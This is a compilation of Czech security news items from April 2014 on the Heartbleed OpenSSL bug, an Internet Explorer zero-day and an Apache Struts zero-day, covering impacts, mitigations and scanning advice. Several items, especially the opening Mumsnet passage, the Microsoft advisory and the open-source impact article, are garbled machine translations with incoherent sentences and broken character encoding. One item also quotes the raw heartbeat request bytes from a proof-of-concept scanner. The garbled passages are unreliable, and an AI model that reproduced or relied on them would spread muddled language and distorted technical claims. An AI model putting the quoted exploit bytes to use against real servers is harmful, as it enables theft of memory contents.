UK-založené internetové stránky pro rodiče Mumsnet také utrpěl porušení, která byla zřejmě potvrdil útočník, jako by byl proveden s využitím této konkrétní zranitelnost. Poté, co se zapletl do několika účtů, útočník použít jednu vysvětlit jeho nebo její motiv:

Nebyla to její telefon nebo osobní počítač je vlevo přihlášen kdekoliv, to bylo heartbleed exploit krvácení uživatelé přihlášení / kombinace hesla ve formátu prostého textu na toho, kdo poslal ten správný dotaz na server. Zatímco tech zaměstnanci byli poměrně rychle ji opravit, stejně jako mnozí jiní tam venku si mysleli, že "šance na to nás ovlivňuje, než náplast jsou nepatrné." Doufám, že akce únos Justine je účet Pomoc pozornost kreslit na to, jak velký problém to je. Mám podezření, že spousta lidí by si ho vzít vážně jinak. Buď rád, že osoba, která má přístup k informacím o serveru byl tak laskav, aby vám všichni víme (a alespoň pokusit být vtipný s ním), místo toho, aby prostě sedí na informacích.


Kyberzločinci našli první „posmrtnou“ zranitelnost Windows XP

28.4.2014 Zranitelnosti
Internet Explorer 6, 7 a 8 ještě nebyl napaden, ale kritická bezpečnostní slabina v nich očividně je.

Podle sobotního prohlášení Microsoftu dochází k pokusům o zneužití chyby, která existuje v Internet Exploreru od verze 6 výše. Jde o snahy přesměrovat uživatele prohlížeče na infikované weby, kde by se na jejich počítač nainstaloval malware.

Zranitelné jsou všechny podporované verze Internet Exploreru, včetně verze 6, která pochází dokonce z roku 2001. I tato archaická verze je podporována, ale pouze na operačním systému Windows Server 2003, kde pro ni i nadále budou uvolňovány bezpečnostní záplaty. Stejná chyba ve stejném prohlížeči tedy nebude opravena ve Windows XP, operačním systému, jehož podpora skončila 8. dubna 2014.

To je důvod, proč je právě ohlášená zranitelnost tak důležitá. Je první a je v podstatě na ní, aby si připravila ovlivněné uživatele na novou realitu. Microsoft již v loňském roce prohlásil, že Windows XP budou po ukončení záplatování o 66 procent pravděpodobněji infikovány. Uživatelé, kteří zůstávají na Windows XP, mají ovšem ještě několik možností, jak nebezpečí nákazy přinejmenším snížit.

Mohou například nainstalovat Enhanced Mitigation Experience Toolkit (EMET) 4.1 – bezpečnostní nástroj, který je zdarma dostupný na webu Microsoftu. Další možností je odregistrovat soubor VGA.dll. Jde o jednu z dynamických knihoven, která vykresluje VML (Vector Markup Language) ve Windows a Internet Exploreru. Podle bezpečnostní firmy FireEye byly dosavadní útoky cíleny pouze na IE 9, 10 a 11 a využívají funkcí zásuvného modulu Adobe Flash Player. Jeho dočasné vypnutí tak eliminuje nebezpečí hrozící ze současných útoků na Internet Explorer.

Pochopitelně dalším řešením je přejít na nějaký alternativní prohlížeč, jako je Google Chrome nebo Mozilla Firefox. Pro ty jejich vydavatelé budou uvolňovat bezpečnostní záplaty minimálně dalších dvanáct měsíců.

Společnost Microsoft sice opravu explicitně nepřislíbila ani pro podporované operační systémy, ale je prakticky jisté, že ji uvolní v nejbližší době. Nejbližší termín pro pravidelně uvolňované aktualizace je 13. května 2014. Microsoft v poslední době spíše ustupuje od mimořádně uspíšených aktualizací, tzv. záplat mimo cyklus. Možným důvodem je přílišné riziko vedlejších efektů a zavlečení chyb v nedostatečně testovaném kódu.

Podle prvních analýz je za útoky na zmiňovanou zranitelnost zkušené kyberzločinecká skupina, která v minulosti již testovala útoky na právě objevené chyby, které ještě neměly možnost opravy. I díky jejich zkušenostem je velmi obtížně monitorovat jejich aktivity, i proto, že nevyužívají opakovaně stejnou řídící infrastrukturu.


IE Zero Day poradenství od společnosti Microsoft
28.4.2014
Zranitelnosti

Společnost Microsoft vydala Advisory Security včera (1), která ovlivňuje Internet Explorer verze 6 až 11, přičemž využívá zranitelnosti v programu Flash. Poradní Microsoft uvádí, že â € œThe zranitelnosti je vzdálené spuštění kódu. â € | zranitelnost může dojít k poškození paměti takovým způsobem, který by mohl útočníkovi umožnit spuštění libovolného kódu v kontextu aktuálního uživatele v aplikaci Internet Explorer. Útočník by mohl být hostitelem speciálně vytvořeného webu, který je určený ke zneužití této chyby zabezpečení prostřednictvím aplikace Internet Explorer a přesvědčit uživatele k návštěvě tohoto website.â €?

Toto využití je v současné době vidět v omezené útoky v této době proti verze IE9-IE11, podle dodavatele bezpečnostní Fireeye (2), který pracuje s MS v tomto okamžiku. V době psaní tohoto článku, oprava není zatím k dispozici.

Opatření, jež mají omezit dopad této chyby zabezpečení:

- Instalace Emet. Podle testování Fireeye v Emet 4,1 a 5 se zlomit využít.

- Zakázat Flash. Všimněte si, že IE 10 a později na Windows 8 jsou uvedeny včetně Flash. Ale stále můžete zakázat. To je IE zranitelnost, ale Flash je třeba ji využít, a vynechat některé z technik ochrany realizovaných v novějších verzích IE / Windows.

- Povolte aplikaci Internet Explorer "Enhanced Mode Protection" (EPM), které byly k dispozici v aplikaci Internet Explorer 10, ale to může zlomit nějaké pluginy..

Â

(1) https://technet.microsoft.com/en-US/library/security/2963983

(2) http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html


Vliv chyby Heartbleed na open source projektů
25.4.2014
Zranitelnosti
Heartbleed chyba v OpenSSL je všechny informační bezpečnosti svět mluví o těchto dnech. Mnozí si začínají uvědomovat, jeho existence otevřel několik plechovek červů.

Jedním aspektem zjevení je, jak to bude mít vliv na profesionály důvěryhodnosti a pravidelní uživatelé mají v open source software. Dr. Robin Seggelmann, 31-rok-starý německý softwarový vývojář, který byl ten, kdo představil chybu Heartbleed do OpenSSL v kódu v prosinci roku 2011, říká, že to byla chyba, která, bohužel, šel nepozorovaně nejprve kódem recenzenta, Dr. Stephen Henson, a pak všichni ostatní za více než dva roky. "Pracoval jsem na zlepšení OpenSSL a předložil četné opravy chyb a nové funkce," Seggelmann vysvětlil pro The Sydney Morning Herald. "V jedné z nových funkcí, bohužel, jsem vynechal potvrzení proměnnou obsahující délku." Dr. Seggelman je přispěvatelem Task Force Internet Engineering (IETF), vědecký pracovník s Munster Univerzitě aplikovaných věd v Německu, a respektovaný bezpečnostní odborník. Popřel vložením chybu na účel a se zlým úmyslem. "Ale v tomto případě , to bylo jednoduché programování chyba v nové funkci, která bohužel došlo v příslušné oblasti bezpečnosti, "řekl. "To nebylo zamýšleno vůbec, zejména proto, že jsem již dříve pevně OpenSSL Chyby sám, a snažil se na projektu podílet." Přesto, že nepopírá, že chyba by mohla být zneužita zpravodajských agentur během tohoto období. "Je to možné, a to je vždy lepší předpokládat to nejhorší, než nejlepším případě v otázkách bezpečnosti, ale protože jsem nevěděl [o] se chyba, až to bylo propuštěno, a [já] není spojen s žádnou agenturou, mohu pouze spekulovat, "dodal. Poukázal na to, že hlavní problém vytvořit open source software je přitahuje přispěvatelů a kód recenzentů, a vyjádřil naději, že tento incident vyvolá více lidí s cílem přispět k open source projektů, zvláště když software je relevantní pro zabezpečení. "tým OpenSSL, který je překvapivě malý, dostal za úkol udržovat svět je nejvíce populární knihovnu TLS. je to těžká práce se v podstatě žádný plat. To zahrnuje přijetí kódu jiné lidi" (jako v případě Heartbeat) a dělá nejlepší možnou práci si ho prohlíží. Pak doufám, že ostatní budou nevšimne a zveřejnit jej zodpovědně před katastrofy se stalo, " poznamenal Matthew Green, cryptographer a výzkum profesor na Johns Hopkins University. "Vývojáři OpenSSL mají docela úžasný rekord s ohledem na množství použití této knihovny dostane a množství starších cruft a počet platforem (přes osmdesát!) mají podporovat. Možná, že ve středu záplatování svých serverů, některé z velkých firem, které používají OpenSSL bude myslet hodil jim nějaké skutečné no-strings-připojený finanční prostředky, aby mohli udržet dělat svou práci. " Google nedávno začal Patch Program odměn pro odměňování výzkumných pracovníků kteří mají za cíl "zlepšit bezpečnost klíčový software třetích stran kritické pro zdraví celého Internetu" s "dolů-k-zemi, proaktivní vylepšení, která jdou nad rámec pouhé stanovení známou bezpečnostní chybu." Program obsahuje mnoho open source projektů , včetně OpenSSL. věc je, jak Paul Roberts poznamenává , že tato situace je "prostý připomínkou, do jaké míry moderní, IT infrastruktura se stala závislá na integritě kódu třetích stran, který příliš často ukáže jako nespolehlivý. Ve skutečnosti, Heartbleed a OpenSSL může skončit dítkem kódu třetích stran auditů.


Apache Struts Zero Day a zmírnění
25.4.2014
Zranitelnosti

Díky Gebhard, žes nám vědět o nové zranitelnosti v Apache Struts.

Pokud si vzpomínáte na ClassLoader zranitelnosti před několika měsíci, oprava, která se zdá být případ, a interpunkce citlivý (pomocí [] místo "." Se neúčtuje)

V každém případě, oni zaslali zmírňování jak na to zde: http://struts.apache.org/announce.html # a20140424

To se týká všech verzí až 2.3.16.1

Více informací na toto téma zde:
http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/


OpenSSL "Heartbleed" chyba ohrožuje široce používaný šifrovací schéma
22.4.2014
Zranitelnosti
OpenSSL, open-source šifrovací knihovna, která je výchozí šifrovací engine pro populární webový server software a je používán v mnoha populárních operačního systému a aplikací, sportovní kritickou chybu, která může být snadno zneužito útočníky vydávat on-line služeb a krást uživatelé informačních věřit . být chráněn protokolem SSL / TLS Co je ještě horší je, že takový útok nezanechává fyzické stopy v protokolech, takže je nemožné říci, zda zranitelnost - přezdívaný "Heartbleed Bug" vědci z Codenomicon a Google, který jej identifikovaných - má byl využit ve volné přírodě, protože byl poprvé představen v prosinci 2011. "A chybějící hranice kontrolu při manipulaci s příponou TLS srdeční lze odhalit až 64 kB paměti do připojeného klienta nebo serveru," OpenSSL je vysvětleno v krátké poradenství . "Neexistuje celkem 64 kb omezení do útoku, že omezení se vztahuje pouze na jednoho srdce. Útočník může buď ponechat, nebo odpojovat během aktivního spojení TLS, aby žádosti o libovolný počet 64KB kousky obsah paměti až dost tajemství jsou odhalil, "vědci stojí za objevem bylo vysvětleno dále. "Heartbleed chyba umožňuje komukoliv na internetu, číst paměť systémů chráněných zranitelných verzí softwaru OpenSSL. To ohrožuje tajné klíče sloužící k identifikaci poskytovatele služeb a šifrování provozu, jména a hesla uživatelů a skutečného obsahu. " Poukázali na to, že chyba není v SSL / TLS protokol sám, ale je programování chyba v knihovně OpenSSL, která poskytuje kryptografické služby, jako SSL / TLS s aplikacemi a službami. Dopad chyby by mohlo být obrovské. "Nejpozoruhodnější software pomocí OpenSSL je open source webové servery jako Apache a Nginx. Kombinovaný podíl na trhu jen ty dva z aktivních míst na internetu, bylo více než 66%, podle Netcraft v dubnu 2014 Web Server Survey, "poukázali. "Dále OpenSSL se používá k ochraně například e-mailových serverů (SMTP, POP a IMAP protokoly), chatovací servery (protokol XMPP), virtuální privátní sítě (SSL VPN), síťová zařízení a širokou škálu software na straně klienta. Naštěstí mnoho velkých spotřebitelských stránky jsou uloženy jejich konzervativní volbou SSL / TLS ukončení činnosti zařízení a softwaru. Ironií je menší a více progresivní služby, nebo ty, kteří přešli na nejnovější a nejlepší šifrování, budou ovlivněny nejvíce. Dále OpenSSL je velmi populární v klientském softwaru a poněkud populární v síťových spotřebičů, které mají největší setrvačnost při získávání aktualizací. " OpenSSL 1.0.1 až 1.0.1f jsou zranitelné. OpenSSL 1.0.1g, který byl propuštěn v pondělí, není, stejně jako OpenSSL 1.0.0 a 0.9.8 poboček. "Operační systém prodejců a distribuce, spotřebiče prodejci, nezávislými prodejci softwaru mají přijmout opravu a informovat své uživatele," vědci vysvětlil další krok. "Poskytovatelé služeb a uživatelé mají na nainstalujte opravu Jakmile je k dispozici pro operační systémy, síťové zařízení a softwaru, které používají. " "Zotavení z tohoto úniku vyžaduje záplatování zranitelnosti, zrušení napadených klíče a vystavením a přerozdělování nové klíče. Dokonce dělá vše pro to bude ještě nechat veškerou komunikaci zachycuje útočník v minulosti stále zranitelné k dešifrování, "vysvětlili." To vše musí být provedeno vlastníky služeb. " Zde je krátký seznam úkolů pro kontrolu zda něčí instalace jsou zranitelné a opravit problém, pokud je tam jeden, a SANS ISC Johannes Ullrich upozorňuje na to rychle, jako důkaz konceptu využití na dálku skenování pro zranitelné systémy byly dány k dispozici. "Je důležité, aby všechny dotčené systémy se aktualizuje okamžitě. Také ke zmírnění útoků vyplývajících z jakéhokoli potenciálně unikly klíčování materiálu, veškeré klíče SSL z postižených systémů by měly být nahrazeny a zrušeny. V závislosti na služby / protokolu, je třeba uvažovat o jiných potenciálně uniklých dat a přijmout vhodná opatření, "poznamenal Mark Schloesser, bezpečnostní výzkumník u Rapid7. "unikly oblasti paměti může obsahovat mnoho různých obsahů od zbylých dat z předchozí komunikace po přihlášení zprávy do soukromého klíče materiál použil služby / démona. Z tohoto důvodu existuje mnoho možných scénářů útoku, které mohou vyplynout z zranitelnosti, "vysvětlil." Útočník, který získá přístup k soukromému klíči certifikátu serveru můžete následně namontovat man-in-the-middle útoky proti klientům a vydávat se za server / službu. Přihlásit zprávy mohou také obsahovat pověření nebo ovlivnit soukromí komunikací ze strany jiných klientů. "


Firmy vytvořit bezpečnostní slepá místa
22.4.2014
Zranitelnosti
Nový výzkum ukazuje, že 54 procent společností ve Velké Británii se používá nesprávné metriky, když se snaží zjistit jejich stav zabezpečení IT, které poskytují falešný obraz o zranitelnosti a rizika organizace, řízení nesprávný chování. Výsledky, získané prostřednictvím průzkumu rozhodnutí, Výrobci ve společnostech s více než 500 zaměstnanci podle Vanson Bourne, také ukazují, že je komunikace propast mezi IT oddělení a zasedací místnosti - a to navzdory skutečnosti, že četnost podávání mezi nimi je rostoucí. Kromě toho průzkum odhaluje potenciál ke zvýšení efektivity ve akcí zabezpečení IT snížením současné rozsáhlé časy podávání zpráv. Měření: velká bezpečnost, malý význam Top na seznamu sledovaných klíčových ukazatelů výkonnosti (KPI), ve Velké Británii 57 procent je " množství bezpečnostních zjištěných porušení. "To KPI je silným ukazatelem koncové detektivní a preventivních kontrol, ale nemusí nutně umožňují proaktivní prevence dalších incidentů. Nicméně, KPI, které dělají prokázat proaktivní prevence jsou sledovány jen menšina firem, s 41 procenty seznam "kontrolovat, zda jejich systémy jsou vybaveny až do data anti-virus nebo malware ochrana" a 30 procent monitorování ", pokud jsou vybaveny Nejnovější verze softwaru ", jsou to oba ukazatele, které jsou důležité pro jeho stanovení stavu zabezpečení. . Protože zero-day exploitu, čímž se minimalizuje čas na zavedení nové záplaty nebo antivirové vzory je rozhodující, ale bývalý KPI je pouze měří o 32 procent a druhý o 19 procent. Povzbudivé je, že 48 procent respondentů ve Velké Británii říkají, že chtějí, aby bylo možné sledovat několik ukazatelů, ale tvrdí, že nedostatek pracovních sil a automatizovaný přístup je drží zpátky. "Transparentnost kolem bezpečnosti je klíčový pro IT manažery, kteří jsou neustále hrají na honěnou v návaznosti na stále se vyvíjející hrozeb, "řekl Gavin Millard, technický ředitel pro Tenable zabezpečení sítě v Evropě, na Středním východě a v Africe. "Navzdory tomu, 54 procent z tvůrců IT s rozhodovací sledujete počet malware detekovat, který je často vnímána jako falešnou vlajkou metrické. Měření množství malware detekovaného dává trochu nahlédnout do účinnosti a efektivnosti řízení; to jen ukazuje, že to funguje na některých systémů, některé z času. Strategická rozhodnutí na základě nesprávných údajů, jsou nejen neúčinné, ale mohou také dát falešný pocit bezpečí. " Překlenutí propasti do zasedací místnosti více než polovina (52 procent) a IT manažeři hlásí stav zabezpečení společnosti na jejich palubě jednou za čtvrt roku nebo více často. Čtyřicet devět procent potvrdit, že IT bezpečnost je vysoká priorita pro jejich ředitele, se 7 procent říká, že to je nejvyšší prioritou. Dále, 50 procent IT respondentů sdílí polovinu nebo více všech sledovaných ukazatelů KPI s jejich palubě, s 26 sdílení všichni procent. "To není překvapující, bezpečnost stává nejvyšší prioritou ředitelů vzhledem k rostoucímu povědomí o nákladech na podniky z narušení dat a dodržování otázky, "pokračoval Millard. "Z tohoto důvodu, to je povzbudivé vidět, jak často IT hlásí do zasedací místnosti, jako před několika lety by to bylo jednou maximálně rok. Nicméně, to má před sebou ještě dlouhou cestu k zajištění porozumění a buy-in z hrací plochy, a to především prostřednictvím lepších komunikačních prostředků. Zjištění ukázala, že ačkoliv obrovské množství informací je sdíleno, je zde nebezpečí utonutí řízení ve irelevantní dat - to se opět odráží ve výsledcích, která zjistila, že pouze 17 procent uvedlo údaje jako "velmi hodnotné" jejich palubě. . Když poskytování metriky, které mají být stručné, na základě nevyvratitelné skutečnosti a prokázat hodnotu podniku " Uvolnění čas na důležitých úkolů Vytvoření průhlednosti v oblasti bezpečnosti IT je obrovský úkol - 39 procent britských firem má řešení IT bezpečnosti ze tří nebo více prodejců v místě a 53 procent shromažďují všechny své zprávy ručně, z nichž 54 procent je třeba hlásit každé čtvrtletí nebo více. V souladu s těmito zjištěními 40 procent potvrdil, že to trvá až dva nebo tři dny sestavit zprávu o řízení připravené. Vzhledem k tomu, 54 procent v úvahu další zdroje pro monitorování řešení přidat další hodnotu k ochraně jejich organizaci před hrozbami. "Při pohledu na tyto výsledky specificky, to stane se bolestně jasné, že IT pracovníci tráví velkou část svého času na podávání zpráv," vysvětlil Millard. "To je čas, který je odnášen z více strategických úkolů, jejichž cílem je zlepšit celkovou bezpečnost IT v podniku. Vypouštěcí ke zdrojům je pak umocněn zvyšující se zátěže řízen vzestupem mobilní a cloud-34 procent respondentů potvrdilo, že musel přidat 20 procent nebo více zařízení nebo služeb, na jejich úsilí monitorování v posledních dvanácti měsících. " "Jako Dokud existují bezpečnostní slepá místa v rámci organizace, budou podniky nebudou moci v klidu před hrozbou útoku. Získání jasnost o účinnosti současných investic do bezpečnosti a dělat, rozhodování na základě rizik založených na datech o tom, co ostatní ovládací prvky jsou nezbytné put podniky na bezpečnější základ. "


OpenSSL Rampage
22.4.2014
Zranitelnosti

OpenSSL, navzdory svému názvu, není ve skutečnosti součástí projektu OpenBSD. Ale jako jeden z více pozitivních výsledků nedávného Heartbleed fiasko, vývojáři OpenBSD, kteří jsou známí pro jejich zaměření na čitelné a bezpečné kódu, nyní začali recenzi plném rozsahu a vyčištění OpenSSL codebase.

Máte-li zájem o psaní bezpečného kódu v C (ne nutně protimluv), doporučuji vám podívat se na http://opensslrampage.org/archive/2014/4 , kde jsou diferenciály OpenBSD-OpenSSL a změny kódu přicházejí rychle a jsou často doprovázeny cynické, ale poučné komentáře. Jako jeden plakát dal to, "já nevím, jestli mám smát nebo plakat." Dobrou zprávou ale určitě je, že OpenSSL kód se podíval na, pečlivě a odborně, a všichni se budou mít lépe pro něj.


Heartbleed lov

22.4.2014 Zranitelnosti

Ano, já vím, že teď jste opravdu unaveni slyšet a číst o Heartbleed. Pravděpodobně jste již dostali všichni testování skriptů a nástrojů a hledáte ve vaší síti pro zranitelné servery.

Jen jsem si hrál s transformátorem SHODAN pro Maltego a hledáte nějaké konkrétní verze OpenSSL. Výsledky nejsou dobré ...

Somethings třeba mít na paměti při kontrole sítě je, že nástroje nemusí detekovat všechny zranitelné počítače, protože může být kočárek sami :)

Podle nějaký výzkum, jeden z prvních skriptů zveřejněných na testování zranitelnosti, a že většina lidí, kteří stále používají k identifikaci zranitelných serverů obsahuje některé chyby, které nemohou detekovat správně zranitelné servery.

Srdeční Žádost generován na důkazů o koncepci skriptu je:

18 03 02 00 03 01 40 00 <- tučné bajtů v podstatě říci, server používat TLS 1.1, takže pokud server podporuje pouze protokol TLS 1.0 nebo TLS 1.2 to nebude fungovat. Samozřejmě, že 1,0 a 1,2 nejsou široce používány, takže šance na to mít v síti je malý, ale stále je tu šance.

Na začátku minulého týdne, při testování různých on-line a off-line nástroje, jsem také narazil na různé výsledky, takže možná budete chtít použít různé nástroje na kontrolu.

Síťové podpisy mohou také poskytnout dodatečnou kontrolu, které vám pomohou identifikovat zranitelné počítače. Opět je zde možnost falešných poplachů, ale stojí za to, aby vám poskytl více informací o svých kontrol.

Snort podpisy a sítě analyzuje na produkty, jako jsou Netwitness může být velmi efektivní pro detekci nejen při využití byl použit proti svému hostiteli, ale co je nejdůležitější, když vaše zranitelné hostitel poskytuje informace zpět (úniku informací).

Šťastný lov na vás, protože protivníci jsou již na lov!


Heartbleed CRL aktivity Spike Nalezeno

22.4.2014 Zranitelnosti

Aktualizace: CloudFlare publikoval v jejich blogu dvakrát dnes tvrdí, odpovědnost za většinu tohoto hrotu. Cituji: "Pokud se domníváte, že globální průměrná cena za připojení je kolem $ 10/Mbps, jen podporuje provoz dodávat CRL by přidali 400.000 dolar USD na GlobalSign měsíčního pásma účtu."

Aktualizace: Také jsme viděli články z ZDNet a WIRED dnes v reakci na níže uvedené postřehy, s další analýzou v něm.

Vypadá to, že, jak jsem tušil, čísla CRL činnosti jsme byli svědky neodráží skutečný objem způsobené OpenSSL Heartbleed chyby.

Dnes večer jsem si všiml masivní bodec ve výši zrušeních nahlášení tomto CRL: http://crl.globalsign.com/gs/gsorganizationvalg2.crl

Spike je tak velký, že jsme původně mysleli, že je to chyba, ale my jsme od té doby potvrdila, že je to skutečné! Mluvíme o více než 50.000 unikátních zrušeních z jednoho CRL.

Jedná se o řádově největší špice na zrušení činnosti za poslední léta, podle našich současných údajů.

Jsem se vytvořit novou stránku pro každý sledovat činnost, jakož i vidět, jak jsme se získat tato data. Stránky lze nalézt na https://isc.sans.edu/crls.html .

Jak budete používat tuto stránku ve svých projektech a obecné analýzy? Rádi bychom slyšet nějaké nápady.

Pokud víte o dalších CRL, že můžeme přidat, dejte nám prosím vědět v komentářích! Navíc, pokud byste chtěli vidět, volání API přidány, takže můžete nám automaticky dotaz k této informaci, prosím, dejte nám vědět, že jsme si vědomi poptávky.

Na okrajové poznámce, můžeme vidět jasný vzestupný trend zrušeních za poslední 3 nebo 4 roky.
Co si připisují konzistentní růst odvolání příkazu k? Co si myslíte, že způsobilo předchozí hroty?


Heartbleed: Síť Tor omezuje provoz

22.4.2014 Zranitelnosti
Anonymizační síť Project Tor označila 380 ze svých směrovačů jako zranitelné vůči chybě Heartbleed a ze své sítě je vyloučila, čímž významně snížila svou vstupní i výstupní kapacitu.

Toto rozhodnutí již vešlo v platnost na serveru, který spravuje seznam směrovačů Tor a který řídí hlavní šéf této anonymní sítě, Roger Dingledine. Jeho příkladu budou brzy následovat i všechny ostatní servery.

Podle Dingledina bude okamžitým důsledkem tohoto rozhodnutí snížení kapacity o 12 %, což sice nezní jako tolik, ale tyto vstupní a výstupní směrovače hrají v síti velmi důležitou roli a je celkem náročné je nahradit. Mnoho z nich běží na serverech dobrovolníků, ti však musejí být důvěryhodní a potřebují dostatečnou šířku pásma, aby provoz několika klientů zvládli.

Tento zákaz směrovačů by mohl být trvalý, Dingledine totiž řekl, že takto vyřazené servery už zpět na síti nechce, i kdyby OpenSSL aktualizovaly, protože jejich provozovatelé chybu neopravili včas.

O existenci chyby Heartbleed se ví od 7. dubna. Heartbleed ovlivňuje verze OpenSSL 1.0.1 až 1.0.1f a útočníkům umožňuje vyjmout informace z paměti aplikací, jež se na OpenSSL spoléhají. Nezáleží přitom na tom, zda se konkrétní aplikace chová jako klient nebo server.

„Směrovače a mosty Toru by mohly přijít o své onion klíče (které se mění jednou týdně) i o dlouhodobé identifikační klíče,“ napsal minulý týden Dingledine. „Útočník, který má oba tyto klíče, se může vydávat za váš server. Nejlepším řešením je aktualizovat OpenSSL, vymazat veškeré soubory spojené s klíči v DatDirectory a restartovat Tor, čímž se vygenerují klíče nové.“

Kromě 380 již zakázaných směrovačů se zranitelnost dotýká více než 1 000 dalších, které by měly být na seznam zamítnutých serverů připojeny v blízké budoucnosti, upozornil Dingledine.


Oprava Chyby krvácejícího srdce může zbrzdit internet

16.4.2014 Zranitelnosti
Chyba krvácejícího srdce (The Heartbleed Bug), která se týká šifrovací knihovny OpenSSL, zasáhla podle odhadů expertů dvě třetiny internetu. Stovky tisíc webových stránek proto v posledních dnech usilovně tuto trhlinu záplatují, což může způsobovat v některých případech výpadky nebo i zpomalení internetu. Informoval o tom list The Washington Post.
Uživatelé by měli z preventivních důvodů změnit na všech serverech, kterých se zranitelnost dotkla, svá hesla.
Rozsah práce, která je nutná k odstranění tohoto druhu hrozby, by mohl přetížit systémy určené k zajišťování důvěryhodnosti internetu. Heartbleed totiž umožňuje krást takzvané bezpečnostní certifikáty, jejichž prostřednictvím se ověřuje pravost webových stránek.

"Rozsah zla, který to umožňuje, je z velké části omezen jen představivostí padouchů," řekl expert na počítačovou bezpečnost Jason Healey.

Když uživatel internetu navštíví bezpečnou stránku, prohlížeč porovná její certifikát zabezpečení se seznamem neplatných certifikátů. Tyto seznamy byly dosud poměrně krátké, protože certifikáty se dlouhodobě nemění.

S příchodem chyby Heartbleed ale na seznam přibudou certifikáty stovek tisíc stránek, a prohlížeče tak budou muset do počítačů stahovat obří složky, vysvětluje konzultant Paul Mutton z firmy Netcraft. Kontrola identity stránek tak bude trvat mnohem déle.

Na certifikáty upozornila hackerská soutěž
Společnost CloudFlare minulý pátek vyzvala hackery, aby se s pomocí Heartbleedu pokusili ukrást bezpečnostní certifikát ze zvláštního serveru, který firma za tím účelem vytvořila a který obsahoval Heartbleed. Po několika hodinách jí začali hackeři posílat e-maily "podepsané" příslušným certifikátem.

"Byl to zábavně strávený páteční večer a dobrá příležitost k prověření vlastních dovedností v legální hackerské akci," napsal listu The Washington Post první z úspěšných hackerů Fedor Indutny.

Rozsah Chyby krvácejícího srdce je tak obrovský, protože OpenSSL patří k nejrozšířenějšímu kryptovacímu softwaru na internetu. Uživatelé by proto podle nich měli z preventivních důvodů změnit na všech serverech, kterých se zranitelnost dotkla, svá hesla.

Mezi postiženými byly i velké portály, jako jsou například Yahoo.com, Flickr.com či Mail.com. I proto se podle BBC jedná o jednu nejzávažnějších bezpečnostních trhlin v historii internetu. Chyba, která by v takovém rozsahu vystavila internet potenciálním útokům, se totiž zatím nikdy neobjevila.


Heartbleed: Další informace o chybě OpenSSL

16.4.2014 Zranitelnosti
O závažné chybě knihovny OpenSSL se píše neustále, jak se ukazuje, je panika celkem oprávněná. Navíc jedna změna hesel možná nebude stačit.

Heartbleed je bezpečnostní chyba v kryptografické knihovně OpenSSL, která je otevřená a je velmi rozšířená a používaná například v protokolu TLS, který se mimo jiné používá k „bezpečnému“ spojení s webovými servery. 7. dubna, kdy se o její existenci dozvěděla veřejnost, se podle odhadů týkala asi 17 procent zabezpečených serverů. Chyba, registrovaná v seznamech pod označením CVE-2014-0160, měla umožnit útočníkům získat z paměti serveru hesla a cookies koncových uživatelů. Realita se ale ukazuje být mnohem horší...

11. dubna vyhlásil cloudový provozovatel CloudFlare výzvu o vytěžení maxima informací z vyhrazeného serveru s aktivní chybou. Během několika hodin ale řada výzkumníků i anonymů dokázala ukrást privátní klíče serveru, což jsou oficiálně (a draze) vydávané certifikáty, které umožňují vytvářet jednoduše nerozpoznatelné kopie webů.

Oznámení bylo načasováno na stejný den, kdyby na chybu připravena záplata. To ale v žádném případě neznamená vše zachraňující bleskurychlou reakci. Řada firem se pokusila okamžitě aktualizovat své servery a následně si nechat vygenerovat nové klíče (jejichž veřejná polovina by měla k uživatelům docestovat automaticky), ovšem docházelo k chybám, a tedy opakovaným pokusům (včetně odvolávání právě vydaných klíčů). Je otázkou, jak dlouho bude ještě chyba, či ji obsahující fungující implementace, existovat na webu. Knihovna se ale používá i v některých aktivních síťových prvcích, které se nemusí dát tak snadno aktualizovat – solidní výrobci dnes procházejí vlastní hardware a pomalu uveřejňují seznam problematických modelů a návodů, co s nimi.

U bezpečnosti často hrozí dominový efekt, kdy prozrazení jednoho hesla vede k postupnému průniku do dalších systémů. Tady je vždy klíčovým faktorem délka rizikového období. Už jen proto, že více času znamená více automatizovaných nástrojů, které se postupně šíří v různých agenturách i zločineckých skupinách a nakonec se stanou na internetu běžně dostupnou komoditou.

I z tohoto pohledu je to s Krvácejícím srdcem špatné. Chybu objevil Google zřejmě jako první okolo 21. března, organizaci OpenSSL informoval 1. dubna (a to datum bylo zvoleno očividně velmi nešťastně). Chybu ale nezávisle na Googlu objevily i další organizace. Důvodem této zdánlivě podezřelé kumulace objevů je nejspíše intenzivní výzkumná činnost v této oblasti, v reakci na nedávný bezpečnostní problém platformy iOS (chyba SSL označená jako CVE-2014-1266, která ovšem ve světle nových poznatků je celkem neškodnou záležitostí).

Opravdu špatné ale je, že chyba existuje ve zdrojovém kódu celé dva roky (díky jeho otevřenosti a datování jednotlivých změn víme alespoň tohle). Už dva nezávislé anonymní zdroje prý potvrdily, že americká agentura NSA o chybě věděla prakticky od začátku. Oficiální reakce NSA i amerického prezidenta Obamy jsou frázovány natolik standardizovaně („je naší povinností“, „americké zájmy“, „nemůže potvrdit ani vyvrátit“), abychom si všichni vybrali, čemu věřit.

Knihovna OpenSSL bohužel skutečně populární, a tak situace nadále eskaluje. Špatné verze lze nalézt v aplikacích i v hardwaru, na mobilech, vestavných zařízení, ale i firewallech těch nezvučnějších značek. Podle pondělních zpráv existuje i možnost „reverzního útoku.“ Zatímco v normální variantě útočník získává možnost klonovat certifikovanou identitu serveru a přístup k vašim přístupovým údajům (což nemusí znamenat totéž co přístupové údaje například do vašeho bankovního řešení). Jak se ukazuje, může útok probíhat i obráceně a až do odvolání všech zpochybněných certifikátů se vašemu klientu nemusí podařit odlišit oficiální nejakabanka.cz od nejakabanka.cz běžící v ruské kyberzločinecké síti.

Časté měnění hesel pomáhá jen teoreticky, dokud je provádíte na potenciálně infikovaných službách. Určitě rizika zmenšuje nepříliš praktikované a bolestivě nepraktické rozlišování hesel, co služba to jiné heslo. V každém případě nastává doba, kdy je třeba provést audity a zjistit, které zařízení v našem dosahu je v jakém stavu. Různé nástroje jsou například k dispozici na internetu, ale samozřejmě jsou buď přetížené... nebo potenciálně falešné...

Celá infrastruktura certifikátů je naštěstí postavena s možností dynamické obměny klíčů. Provozovatelé si tak mohou (měli by) pořádat o vydání nových klíčů (které by měli dostat od certifikované agentury potom, co si ověří, že skutečně má co do činění se správnou osobou), veřejný klíč by potom měl sám docestovat ke klientským implementacím.

